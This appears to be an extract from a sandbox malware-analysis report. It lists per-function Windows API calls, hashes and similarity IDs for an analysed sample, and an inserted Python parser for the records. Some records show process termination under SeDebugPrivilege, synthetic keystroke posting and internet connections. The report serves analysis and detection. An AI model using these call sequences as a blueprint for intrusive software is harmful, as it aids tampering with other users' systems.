                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                                                                                                  • Opcode ID: dbe63755b2d741e0d61235b4a19365d6b56c51779a10260846745594a812213c
                                                                                                                                                                                                                                  • Instruction ID: 4df39ad40f6b7726217b8600ac2bdf3d25a00e623d56f07bdea91416a00dcf80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbe63755b2d741e0d61235b4a19365d6b56c51779a10260846745594a812213c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BC1373991464ADBDF10CFE8C540BEDF7B5FF18310F14841AE8A5A3250DB38A951DB61
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1282221369-0
                                                                                                                                                                                                                                  • Opcode ID: 3c6d126a265c3a7ce3e8d05cfe0942b24c883354f1cf60984bcbfe02c11887e6
                                                                                                                                                                                                                                  • Instruction ID: 9214a32bc367b4655bc3dc3cd9f7447b927aeff287942e2b5bdbd157332724d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c6d126a265c3a7ce3e8d05cfe0942b24c883354f1cf60984bcbfe02c11887e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9613571D06300AFDB25AFB8D881FAE7BB8EF45320F18057EE955A7281E631D9418793
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A25C24
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00A25C65
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A25C6B
                                                                                                                                                                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A25C6F
                                                                                                                                                                                                                                    • Part of subcall function 00A279F2: DeleteObject.GDI32(00000000), ref: 00A27A1E
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A25CAB
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A25CB8
                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A25CEB
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A25D25
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A25D34
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3210457359-0
                                                                                                                                                                                                                                  • Opcode ID: c39a9b182fb4e20bd04d70e79eb35105f412e8b099aded58ca5ea2e63217d62c
                                                                                                                                                                                                                                  • Instruction ID: a298dcd07ac5e963af0a40f9748afc47f8a5ec4e21718ccff355c8a60dbca9b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c39a9b182fb4e20bd04d70e79eb35105f412e8b099aded58ca5ea2e63217d62c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9519F30E50A29BFEF349BBCEC49B983B61FB04760F244131F914AA1E1D775A981DB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009D28D1
                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009D28EA
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009D28FA
                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009D2912
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009D2933
                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009911F5,00000000,00000000,00000000,000000FF,00000000), ref: 009D2942
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009D295F
                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009911F5,00000000,00000000,00000000,000000FF,00000000), ref: 009D296E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1268354404-0
                                                                                                                                                                                                                                  • Opcode ID: 8e1eb389f7a0ee902d68c9de1f102e951f19c20182517839e74b3b72851cd1d0
                                                                                                                                                                                                                                  • Instruction ID: 32904e95f945ff5d3c04e833656f95c65de3b2908bbd980b2b025bd277e34414
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e1eb389f7a0ee902d68c9de1f102e951f19c20182517839e74b3b72851cd1d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02518C3064020AAFDF24CF69CC45BAA7BB9FF98710F108529F942972E0D770E982DB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A0CBC7
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00A0CBDA
• SetEvent.KERNEL32(?), ref: 00A0CBEE
  • Part of subcall function 00A0CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A0CCB7
  • Part of subcall function 00A0CC98: GetLastError.KERNEL32 ref: 00A0CD67
  • Part of subcall function 00A0CC98: SetEvent.KERNEL32(?), ref: 00A0CD7B
  • Part of subcall function 00A0CC98: InternetCloseHandle.WININET(00000000), ref: 00A0CD86
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: 505293a7c7cfa5234be3f6a5627a2d20427ec653ce9af8682e45ecd7800c6c79
• Instruction ID: d483801e62d3842372ce05b934ade0496643b776e09f72c40c10cc4a7b2360ee
• Opcode Fuzzy Hash: 505293a7c7cfa5234be3f6a5627a2d20427ec653ce9af8682e45ecd7800c6c79
• Instruction Fuzzy Hash: A931AF71500709AFEB218FB5ED44A7BBBF8FF04320B14462DF85A86651C734E916EBA0
APIs
  • Part of subcall function 009F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F43AD
  • Part of subcall function 009F4393: GetCurrentThreadId.KERNEL32 ref: 009F43B4
  • Part of subcall function 009F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009F2F00), ref: 009F43BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009F2F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009F2F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009F2F2C
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009F2F36
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009F2F4E
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009F2F52
• MapVirtualKeyW.USER32(00000025,00000000), ref: 009F2F5C
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009F2F70
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009F2F74
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 1033d3b689308e531f23a58ea7e060c57c4d5fcd21d8386313e035387aa36511
• Instruction ID: bc5a1db7f6e2798750283b3bead05420b29d5a6b0bbc3b81b988f913e5be1e8f
• Opcode Fuzzy Hash: 1033d3b689308e531f23a58ea7e060c57c4d5fcd21d8386313e035387aa36511
• Instruction Fuzzy Hash: D701D8307942147BFB2067A9DC8AF793F5ADB8DB11F100021F318AE1E1C9F154568BA9
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009F1D95,?,?,00000000), ref: 009F2159
• HeapAlloc.KERNEL32(00000000,?,009F1D95,?,?,00000000), ref: 009F2160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009F1D95,?,?,00000000), ref: 009F2175
• GetCurrentProcess.KERNEL32(?,00000000,?,009F1D95,?,?,00000000), ref: 009F217D
• DuplicateHandle.KERNEL32(00000000,?,009F1D95,?,?,00000000), ref: 009F2180
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009F1D95,?,?,00000000), ref: 009F2190
• GetCurrentProcess.KERNEL32(009F1D95,00000000,?,009F1D95,?,?,00000000), ref: 009F2198
• DuplicateHandle.KERNEL32(00000000,?,009F1D95,?,?,00000000), ref: 009F219B
• CreateThread.KERNEL32(00000000,00000000,009F21C1,00000000,00000000,00000000), ref: 009F21B5
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: f1c47f6115c1a4123cb61bfcefce7c89d73a42a23ae4d298854bd874d87d1cf6
• Instruction ID: 5c50ec817090f20b774410db33a92cd4db520edc3e0f97edefc40781f4b98fe6
• Opcode Fuzzy Hash: f1c47f6115c1a4123cb61bfcefce7c89d73a42a23ae4d298854bd874d87d1cf6
• Instruction Fuzzy Hash: 6301BFB5640304BFE720EFA9DC4EF677BACEB88711F004521FA05DB1A1C6709812CB60
APIs
  • Part of subcall function 009FDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 009FDDAC
  • Part of subcall function 009FDD87: Process32FirstW.KERNEL32(00000000,?), ref: 009FDDBA
  • Part of subcall function 009FDD87: FindCloseChangeNotification.KERNEL32(00000000), ref: 009FDE87
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A1ABCA
• GetLastError.KERNEL32 ref: 00A1ABDD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A1AC10
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00A1ACC5
• GetLastError.KERNEL32(00000000), ref: 00A1ACD0
• CloseHandle.KERNEL32(00000000), ref: 00A1AD21
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 1701285019-2896544425
• Opcode ID: 431aa43548acb164684790fa6b500f9517e9f530afeac1ed3499b29faaf39467
• Instruction ID: 63fde9ad9029ebeb2043a7842ffc6d1fedae00380d5e42597109c29ab0cbaa8f
• Opcode Fuzzy Hash: 431aa43548acb164684790fa6b500f9517e9f530afeac1ed3499b29faaf39467
• Instruction Fuzzy Hash: 4C61B074209641AFD720DF58C495F65BBE1AF94308F14849CE46A8FBA3C771EC86CB92
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A243C1
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A243D6
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A243F0
• _wcslen.LIBCMT ref: 00A24435
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00A24462
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A24490
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                                                                                  • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                  • Opcode ID: 380a5f74bbe32178ff630f278f543d3977408906fda4edcb6b1d8e60b3c39516
                                                                                                                                                                                                                                  • Instruction ID: 7479a9a4e3f154e839b96ee52c00176ef8a8b192b330fc2c2872f9fe185d8210
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 380a5f74bbe32178ff630f278f543d3977408906fda4edcb6b1d8e60b3c39516
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41CE31900328ABDB21DFA8DC49BEA7BA9FB4C360F100526F944EB291D7749980CB90
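The records in this section are the Joe Sandbox IDA plugin's per-function output, which the report viewer only shows one function at a time. To work with them outside the viewer (diffing Opcode IDs between two samples, or reading the raw SendMessageW message numbers as names) the following parser is an added example written for this page; it is not Joe Sandbox code and not part of the report. It assumes the record layout seen above (an "APIs" header starts each record, bullet lines of the form "Name.MODULE(args), ref: address" or "Key: value"), strips the "Download File" link text the HTML viewer fuses onto the "Associated" lines, and resolves the three list-view messages from the first record using values from the Windows SDK header commctrl.h. The sample input is two records abridged from this section.

```python
"""Parser for the Joe Sandbox IDA-plugin function records in this section (added
example, not Joe Sandbox code): one FunctionBlock per record, viewer link residue
stripped, and SendMessageW message numbers resolved to commctrl.h names."""
import re
from dataclasses import dataclass, field

# List-view messages seen in the first record above (commctrl.h, LVM_FIRST = 0x1000).
LVM_NAMES = {0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE", 0x1057: "LVM_GETSTRINGWIDTHW", 0x1061: "LVM_INSERTCOLUMNW"}

# "• SendMessageW.USER32(00000000,00001036,?,?), ref: 00A243C1"  or  "• _wcslen.LIBCMT ref: 00A24435"
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"   # link text the HTML viewer fuses onto "Associated" lines

@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # arguments exactly as printed: "00001036", "?", ...
    ref: int     # call-site address

    def message_name(self):
        """For SendMessageW, resolve uMsg (args[1]) to a known LVM_* name; None if unknown or '?'."""
        if self.name != "SendMessageW" or len(self.args) < 2 or not re.fullmatch(r"[0-9A-Fa-f]+", self.args[1]):
            return None
        return LVM_NAMES.get(int(self.args[1], 16))

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)     # "API ID", "Opcode ID", ... -> value
    associated: list = field(default_factory=list)

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID", "")

def parse_blocks(text):
    """Split report text into records; each 'APIs' header starts a new FunctionBlock."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None:
            continue                      # text before the first record
        if line.endswith(LINK_RESIDUE):
            line = line[:-len(LINK_RESIDUE)].rstrip()
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            name, module, args, ref = m.groups()
            current.apis.append(ApiCall(name, module, args.split(",") if args else [], int(ref, 16)))
            continue
        m = KV_RE.match(line)
        if m:
            key, value = m.groups()
            if key == "Associated":
                current.associated.append(value)
            else:
                current.fields[key] = value
    return blocks

def summarize(block):
    """API sequence on one line, with list-view messages named where known."""
    return " -> ".join(f"{c.name}[{c.message_name()}]" if c.message_name() else c.name for c in block.apis)

def shared_opcode_ids(blocks_a, blocks_b):
    """Opcode IDs present in both sets: identical function bodies, independent of load address."""
    return sorted(({b.opcode_id for b in blocks_a} & {b.opcode_id for b in blocks_b}) - {""})

# Two records abridged from this section, with the indentation and link residue as extracted.
SAMPLE = """
    APIs
    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A243C1
    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A243D6
    • _wcslen.LIBCMT ref: 00A24435
    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A24462
    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A24490
    Memory Dump Source
    • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
    Similarity
    • API ID: MessageSend$Window_wcslen
    • String ID: SysListView32
    • Opcode ID: 380a5f74bbe32178ff630f278f543d3977408906fda4edcb6b1d8e60b3c39516
    APIs
    • LoadIconW.USER32(00000000,00007F03), ref: 009FD1BE
    Similarity
    • API ID: IconLoad
    • String ID: blank$info$question$stop$warning
    • Opcode ID: da07545f9231e9fea4194fcf5286b0f9195c42e6c474d410c09b4ac459537ae2
"""
```

Running `parse_blocks(SAMPLE)` yields two records; `summarize` on the first reads "SendMessageW[LVM_SETEXTENDEDLISTVIEWSTYLE] -> SendMessageW[LVM_SETEXTENDEDLISTVIEWSTYLE] -> _wcslen -> SendMessageW[LVM_GETSTRINGWIDTHW] -> SendMessageW[LVM_INSERTCOLUMNW]". The Opcode ID is the field to key on when comparing two reports: it hashes the function body with addresses normalised, so it survives a different image base, whereas the "ref:" addresses do not.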
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009FC6C4
• IsMenu.USER32(00000000), ref: 009FC6E4
• CreatePopupMenu.USER32 ref: 009FC71A
• GetMenuItemCount.USER32(019B5780), ref: 009FC76B
• InsertMenuItemW.USER32(019B5780,?,00000001,00000030), ref: 009FC793
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: 843c0f2ca130d703ad7d4929d1d1107be61548917c13f620ae01b72af292adfa
• Instruction ID: 1033b55201596926ce1582435ea1765d5992972c10aae9856cea763aeafe5d1f
• Opcode Fuzzy Hash: 843c0f2ca130d703ad7d4929d1d1107be61548917c13f620ae01b72af292adfa
• Instruction Fuzzy Hash: 265192B060020D9BDF20EFA8DA84BBEBBF9AF54314F24C52AE611E7295D3709945CF51
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 009FD1BE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: da07545f9231e9fea4194fcf5286b0f9195c42e6c474d410c09b4ac459537ae2
• Instruction ID: 4b12796241ec54fd1589c027ccbb9a7108ccebe3efa0f6b5418ddea8fe90c4fc
• Opcode Fuzzy Hash: da07545f9231e9fea4194fcf5286b0f9195c42e6c474d410c09b4ac459537ae2
• Instruction Fuzzy Hash: 1911DA3534D30EBEEB0D5B54EC82EBE779DAF49761B20042AFA04A61C2E7B47A415360
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
• Opcode ID: e59169472270f67cf61718f8a6c5f39095cbf91adcb1d08548569dccd252e5cb
• Instruction ID: d3af4fa18e8f81d38056f68801b07f5bcdb232a86e3735db780a45e8ae2aa459
• Opcode Fuzzy Hash: e59169472270f67cf61718f8a6c5f39095cbf91adcb1d08548569dccd252e5cb
• Instruction Fuzzy Hash: F711B4319041197FDB24B764DD4AEFE77ACEF41720F1000B5F645A60A2EF748A869790
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$LocalTime
• String ID:
• API String ID: 952045576-0
• Opcode ID: cc6f3472e8cd362a09c056b0e535b686855306b7833c8743f138612a747e5812
